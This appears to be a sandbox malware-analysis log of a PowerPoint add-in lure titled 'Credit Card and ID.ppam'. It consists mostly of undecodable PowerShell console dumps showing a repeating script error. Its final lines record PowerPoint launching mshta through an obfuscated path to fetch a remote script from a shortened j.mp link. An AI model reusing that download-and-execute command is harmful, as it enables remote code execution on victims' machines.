Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....8................._.............}..v............0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....8................._.............}..v............0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v............0.......................v....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k......................_.............}..v....H.......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............A.t. .l.i.n.e.:.3.6.6. .c.h.a.r.:.3.5...........}..v....`.......0...............(\S.....&....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k......................_.............}..v............0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v............0.......................Z....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p................._.............}..v............0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k......................_.............}..v............0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............ . . .n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.....}..v............0...............(\S.....,....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k......................_.............}..v....H.......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v............0.......................l....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....@................._.............}..v............0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............ .........*k....p_S..............._.............}..v....P.......0...............(\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k......................_.............}..v............0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v....p*......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....(+................_.............}..v.....+......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v....p2......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....(3................_.............}..v.....3......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v.....9......0.......................v....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k.....9................_.............}..v....8:......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............A.t. .l.i.n.e.:.3.6.6. .c.h.a.r.:.3.5...........}..v....P>......0...............(\S.....&....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k.....?................_.............}..v.....?......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....#.................*k....p_S..............._.............}..v.....D......0.......................Z....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....#.................*k....`E................_.............}..v.....E......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w..../.................*k....p_S..............._.............}..v.....L......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w..../.................*k....`M................_.............}..v.....M......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....;....... . . .n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.....}..v.....R......0...............(\S.....,....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....;.................*k.....R................_.............}..v....8S......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....G.................*k....p_S..............._.............}..v....xX......0.......................l....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....G.................*k....0Y................_.............}..v.....Y......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....S....... .........*k....p_S..............._.............}..v....@]......0...............(\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....S.................*k.....]................_.............}..v....x^......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....g.................*k....p_S..............._.............}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....g.................*k......................_.............}..v....8.......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....s.................*k....p_S..............._.............}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....s.................*k......................_.............}..v....8.......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v............0.......................v....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....H................._.............}..v............0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............A.t. .l.i.n.e.:.3.6.6. .c.h.a.r.:.3.5...........}..v............0...............(\S.....&....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k......................_.............}..v............0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v....8.......0.......................Z....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k......................_.............}..v....p.......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v....8.......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k......................_.............}..v....p.......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............ . . .n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.....}..v............0...............(\S.....,....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....H................._.............}..v............0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v............0.......................l....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k......................_.............}..v....@.......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............ .........*k....p_S..............._.............}..v............0...............(\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k......................_.............}..v............0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....H................._.............}..v............0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: 150 writes to the console screen buffer captured in this section. The sandbox dumps each write as raw bytes with non-printable bytes shown as dots, so UTF-16LE text appears as characters separated by dots. Only the fragments listed below are decodable; the remaining writes contain no readable text.
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: At line:366 char:35 (9 occurrences, one every 18 writes)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ...ndNotFoundException (8 occurrences, each 6 writes after an "At line:366 char:35" write; the start of the exception type name is not present in the capture)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: EM (2 occurrences, no further readable text)
The repeating pair matches PowerShell's default error display for an ErrorRecord ("At line:N char:M" followed a few lines later by a CategoryInfo line that ends in the exception type name). The PowerShell script executed by this sample therefore fails at line 366, character 35 with a ...NotFoundException on every pass, and the regular cadence is consistent with the failing statement being executed repeatedly, for example inside a loop.
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v....8Nc.....0.......................Z....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k.....Nc..............._.............}..v....pOc.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v....8Vc.....0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k.....Vc..............._.............}..v....pWc.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............ . . .n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.....}..v.....[c.....0...............(\S.....,....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....H\c..............._.............}..v.....\c.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v.....bc.....0.......................l....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k.....bc..............._.............}..v....@cc.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............ .........*k....p_S..............._.............}..v.....fc.....0...............(\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k.....gc..............._.............}..v.....hc.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v......o.....0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....H.o..............._.............}..v......o.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v......o.....0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....H.o..............._.............}..v......o.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v.... .o.....0.......................v....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k......o..............._.............}..v....X.o.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............A.t. .l.i.n.e.:.3.6.6. .c.h.a.r.:.3.5...........}..v....p.o.....0...............(\S.....&....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....(.o..............._.............}..v......o.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....#.................*k....p_S..............._.............}..v......o.....0.......................Z....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....#.................*k......o..............._.............}..v......o.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w..../.................*k....p_S..............._.............}..v......o.....0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w..../.................*k......o..............._.............}..v......o.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....;....... . . .n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.....}..v.... .o.....0...............(\S.....,....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....;.................*k......o..............._.............}..v....X.o.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....G.................*k....p_S..............._.............}..v......o.....0.......................l....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....G.................*k....P.o..............._.............}..v......o.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....S....... .........*k....p_S..............._.............}..v....`.o.....0...............(\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....S.................*k......o..............._.............}..v......o.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....g.................*k....p_S..............._.............}..v....@.{.....0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....g.................*k......{..............._.............}..v....x.{.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....s.................*k....p_S..............._.............}..v....@.{.....0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....s.................*k......{..............._.............}..v....x.{.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v......{.....0.......................v....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k......{..............._.............}..v......{.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............A.t. .l.i.n.e.:.3.6.6. .c.h.a.r.:.3.5...........}..v.... .{.....0...............(\S.....&....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k......{..............._.............}..v....X.{.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v....x.{.....0.......................Z....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....0.{..............._.............}..v......{.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v....x.|.....0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....0.|..............._.............}..v......|.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............ . . .n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.....}..v......|.....0...............(\S.....,....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k......|..............._.............}..v......|.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v....H.|.....0.......................l....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k......|..............._.............}..v......|.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............ .........*k....p_S..............._.............}..v......|.....0...............(\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k......|..............._.............}..v....H.|.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v.....;......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k.....<................_.............}..v.....=......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v.....C......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k.....D................_.............}..v.....E......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v....`J......0.......................v....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k.....K................_.............}..v.....K......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............A.t. .l.i.n.e.:.3.6.6. .c.h.a.r.:.3.5...........}..v.....O......0...............(\S.....&....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....hP................_.............}..v.....P......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v.....V......0.......................Z....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k.....V................_.............}..v....@W......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v.....^......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k.....^................_.............}..v....@_......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....#....... . . .n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.....}..v....`c......0...............(\S.....,....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....#.................*k.....d................_.............}..v.....d......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w..../.................*k....p_S..............._.............}..v.....i......0.......................l....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w..../.................*k.....j................_.............}..v.....k......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....;....... .........*k....p_S..............._.............}..v.....n......0...............(\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....;.................*k....Xo................_.............}..v.....o......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....O.................*k....p_S..............._.............}..v....`.......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....O.................*k......................_.............}..v............0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....[.................*k....p_S..............._.............}..v....`.......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....[.................*k......................_.............}..v............0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....g.................*k....p_S..............._.............}..v............0.......................v....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....g.................*k......................_.............}..v....(.......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....s.......A.t. .l.i.n.e.:.3.6.6. .c.h.a.r.:.3.5...........}..v....@.......0...............(\S.....&....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....s.................*k......................_.............}..v....x.......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v............0.......................Z....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....P................._.............}..v............0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....P................._.............}..v............0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............ . . .n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.....}..v............0...............(\S.....,....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k......................_.............}..v....(.......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v....h.......0.......................l....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k.... ................._.............}..v............0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............ .........*k....p_S..............._.............}..v....0.......0...............(\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k......................_.............}..v....h.......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k......................_.............}..v....(.......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k......................_.............}..v....(.......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v............0.......................v....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....8................._.............}..v............0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............A.t. .l.i.n.e.:.3.6.6. .c.h.a.r.:.3.5...........}..v............0...............(\S.....&....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k......................_.............}..v............0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v....(.......0.......................Z....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k......................_.............}..v....`.......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v....(.......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k......................_.............}..v....`.......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............ . . .n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.....}..v............0...............(\S.....,....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....8................._.............}..v............0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v............0.......................l....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k......................_.............}..v....0.......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....#....... .........*k....p_S..............._.............}..v............0...............(\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....#.................*k....x................._.............}..v............0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....#.................*k....p_S..............._.............}..v....`82.....0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....#.................*k.....92..............._.............}..v.....92.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w..../.................*k....p_S..............._.............}..v....`@2.....0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w..../.................*k.....A2..............._.............}..v.....A2.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....;.................*k....p_S..............._.............}..v.....F2.....0.......................v....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....;.................*k.....G2..............._.............}..v....(H2.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....G.......A.t. .l.i.n.e.:.3.6.6. .c.h.a.r.:.3.5...........}..v....@L2.....0...............(\S.....&....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....G.................*k.....L2..............._.............}..v....xM2.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....S.................*k....p_S..............._.............}..v.....R2.....0.......................Z....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....S.................*k....PS2..............._.............}..v.....S2.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w...._.................*k....p_S..............._.............}..v.....Z2.....0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w...._.................*k....P[2..............._.............}..v.....[2.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....k....... . . .n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.....}..v....._2.....0...............(\S.....,....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....k.................*k.....`2..............._.............}..v....(a2.....0................\S............................. Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE "C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE" /AUTOMATION -Embedding
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\Desktop\Credit Card and ID.ppam"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE" "C:\Users\user\Desktop\Credit Card and ID.ppam
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process created: C:\Windows\System32\mshta.exe c:\windows\system32\calc\..\mshta https://hahahahh@j.mp/ODOASODOccomplermxjdajse
Source: unknown Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
